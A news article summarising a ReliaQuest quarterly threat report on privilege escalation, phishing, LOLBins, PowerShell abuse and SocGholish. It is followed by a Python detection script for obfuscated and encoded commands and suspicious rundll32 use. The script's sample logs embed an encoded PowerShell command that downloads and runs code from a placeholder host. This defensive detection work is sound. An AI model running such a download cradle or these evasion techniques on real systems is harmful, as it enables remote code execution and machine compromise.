According to a study by ReliaQuest, a digital security response and defense platform, privilege escalation rose from 7.1% to 46.6% of security incidents in the first quarter. Among other hacking methods, "LOLBins", which hijack legitimate Windows files, are still widespread. Phishing remains the most widespread threat.
The trends in the main threats already present in 2023 continued at the beginning of this year. Incident resolution time is longer in the OT (operational technology) security sector, that is, industry, and in IT (public and private organizations). The use of artificial intelligence continues to advance, making it possible to bring the mean time to resolve an incident (MTTR) down to 7 minutes or less.
In the first quarter, the biggest increase among threats was privilege escalation, which gives attackers access to accounts and services; it rose very significantly, from 7.1% to 46.6% of incidents.
Phishing, drive-by compromise (compromising a website with malicious code) and privilege exploitation remain the main attack techniques. Phishing accounts for 27.2% of the critical security incidents recorded by ReliaQuest.
LOLBins (Living Off The Land Binaries) are legitimate Microsoft files such as Rundll32 or Msiexec, or files from other trusted software publishers. Hackers use them to compromise a Windows machine. In 2023, they were the source of a large share of critical incidents, namely 22.3% of them.
PowerShell, Microsoft's task automation solution, is the command execution tool preferred by hackers. It was the cause of 19.4% of incidents in the first quarter, whereas in the fourth quarter of 2023 it was in third place.
Command obfuscation and abuse of Windows RunDLL32 at the forefront of defense evasion methods
Command obfuscation consists of making commands unreadable in order to fool detection systems and make them harder for defenders to analyze. This technique remained at the top of stealth attack techniques, appearing in 22.06% of incidents. LNK files, the Windows shortcut file format, are also used after a compromise to evade defenses.
Misuse of the Windows rundll32 utility is also counted among the most harmful hidden threats. On the malware side, SocGholish, which was relatively uncommon in the fourth quarter of 2023, rose to the top spot in the first quarter of this year. SocGholish is distributed through drive-by compromise, an "exploit" that installs malicious software without the user realizing that their machine is compromised, hence its great danger. In this case, ReliaQuest shows that it pretends to be a web browser update but is actually a malicious JavaScript file. This malware dethroned AsyncRAT, the remote access Trojan, which was the top malware in the last quarter of 2023.
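As an added illustration, not part of the ReliaQuest report or of this article, here is a small Python checker that takes the defender's view of the techniques above and runs it over constructed process-creation log records: it flags caret-obfuscated commands, decodes PowerShell -EncodedCommand payloads, spots rundll32 launched without a DLL or with one from a user-writable path, and notes LOLBins spawned by script hosts (the fake-update .js pattern). The log records, rule names and thresholds are all assumptions made for the example.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (image, parent, command line); not real telemetry.
ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16le")).decode()
SAMPLE_LOGS = [
    ("powershell.exe", "winword.exe", f"powershell.exe -NoP -W Hidden -enc {ENC}"),
    ("powershell.exe", "explorer.exe", 'powershell.exe -c "Get-Process | Sort-Object CPU"'),
    ("cmd.exe", "wscript.exe", "cmd.exe /c p^o^w^e^r^s^h^e^l^l -c Get-Date"),
    ("rundll32.exe", "wscript.exe", r"rundll32.exe C:\Users\bob\AppData\Local\Temp\upd.dll,Start"),
    ("rundll32.exe", "svchost.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ("rundll32.exe", "explorer.exe", "rundll32.exe"),
]
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|Temp|ProgramData|Public)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe"}  # assumed list

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(image, parent, cmdline):
    """Return detection names for one record; an empty list means nothing matched."""
    hits, image, parent = [], image.lower(), parent.lower()
    if cmdline.count("^") >= 4:          # cmd.exe caret escapes splitting up keywords
        hits.append("caret_obfuscation")
    if cmdline.count("`") >= 4:          # PowerShell backtick escapes used the same way
        hits.append("backtick_obfuscation")
    if decode_encoded_command(cmdline) is not None:
        hits.append("powershell_encoded_command")
    if image == "rundll32.exe":
        parts = cmdline.split(None, 1)
        args = parts[1] if len(parts) > 1 else ""
        if "javascript:" in args.lower():   # script protocol handler instead of a DLL
            hits.append("rundll32_script_protocol")
        elif ".dll" not in args.lower() and ".cpl" not in args.lower():
            hits.append("rundll32_no_dll_argument")   # bare rundll32 is a common injection host
        elif USER_WRITABLE.search(args):
            hits.append("rundll32_user_writable_dll")
    if parent in SCRIPT_HOSTS and image in {"rundll32.exe", "powershell.exe", "cmd.exe"}:
        hits.append("script_host_parent")   # fake-update .js or Office macro spawning a LOLBin
    return hits
```

Calling analyze() on each SAMPLE_LOGS record flags four of the six, and decode_encoded_command() recovers the plaintext of the encoded one; in production the same rules would run over real Sysmon event ID 1 or EDR telemetry.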
Finally, phishing still holds its place as the leading threat across all categories: in 2023, links of this kind were used in 71.1% of incidents to facilitate initial access to networks or systems.